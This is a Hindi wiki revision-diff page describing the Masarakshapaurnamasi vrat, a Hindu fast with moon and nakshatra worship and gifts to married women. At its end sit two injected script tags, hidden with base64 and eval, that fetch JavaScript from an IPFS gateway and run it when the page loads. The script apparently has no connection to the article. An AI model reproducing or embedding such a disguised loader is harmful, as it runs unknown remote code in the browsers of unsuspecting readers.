Difference between revisions of "मासरक्षपौर्णमसी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[कार्तिक माह|कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] 15 पर आरम्भ होता है।  
 
*यह व्रत [[कार्तिक माह|कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] 15 पर आरम्भ होता है।  
*शास्त्रोक्त विधि से भोजन; नमक से बने वृत्त, तथा चन्दन लेप से निर्मित [[चंद्र देवता|चन्द्र]] की दस नक्षत्रों के साथ पूजा करनी चाहिए, यथा–कार्तिक में [[कृत्रिका]] एवं [[रोहिणी]] के साथ, [[मार्गशीर्ष]] में [[मृगशिरा]] एवं [[आर्द्रा]] के साथ.....और यह क्रम [[आश्विन]] तक चला जाता है।  
+
*शास्त्रोक्त विधि से भोजन; नमक से बने वृत्त, तथा चन्दन लेप से निर्मित [[चंद्र देवता|चन्द्र]] की दस नक्षत्रों के साथ पूजा करनी चाहिए, यथा–कार्तिक में [[कृत्तिका नक्षत्र|कृत्तिका]] एवं [[रोहिणी]] के साथ, [[मार्गशीर्ष]] में [[मृगशिरा]] एवं [[आर्द्रा नक्षत्र|आर्द्रा]] के साथ.....और यह क्रम [[आश्विन]] तक चला जाता है।  
 
*सधवा नारियों का गुड़, बढ़िया भोजन; घी, दूघ आदि से सम्मान करना चाहिए।  
 
*सधवा नारियों का गुड़, बढ़िया भोजन; घी, दूघ आदि से सम्मान करना चाहिए।  
 
*स्वयं हविष्य भोजन करना चाहिए।  
 
*स्वयं हविष्य भोजन करना चाहिए।  
*अन्त में सोने के साथ रंगीन वस्त्र का दानकरना चाहिए।<ref>विष्णुधर्मोत्तरपुराण (192|1-15)</ref>; <ref>नीलमतपुराण (पृ0 47)</ref>
+
*अन्त में सोने के साथ रंगीन वस्त्र का दानकरना चाहिए।<ref>विष्णुधर्मोत्तरपुराण (192|1-15</ref>; <ref>नीलमतपुराण (पृ0 47</ref>
 
 
 
 
  

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat kartik shukl 15 par arambh hota hai.
  • shastrokt vidhi se bhojan; namak se bane vritt, tatha chandan lep se nirmit chandr ki das nakshatroan ke sath pooja karani chahie, yatha–kartik mean krittika evan rohini ke sath, margashirsh mean mrigashira evan ardra ke sath.....aur yah kram ashvin tak chala jata hai.
  • sadhava nariyoan ka gu d, badhiya bhojan; ghi, doogh adi se samman karana chahie.
  • svayan havishy bhojan karana chahie.
  • ant mean sone ke sath rangin vastr ka danakarana chahie.[1]; [2]

 



tika tippani aur sandarbh

  1. vishnudharmottarapuran (192|1-15
  2. nilamatapuran (pri0 47

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>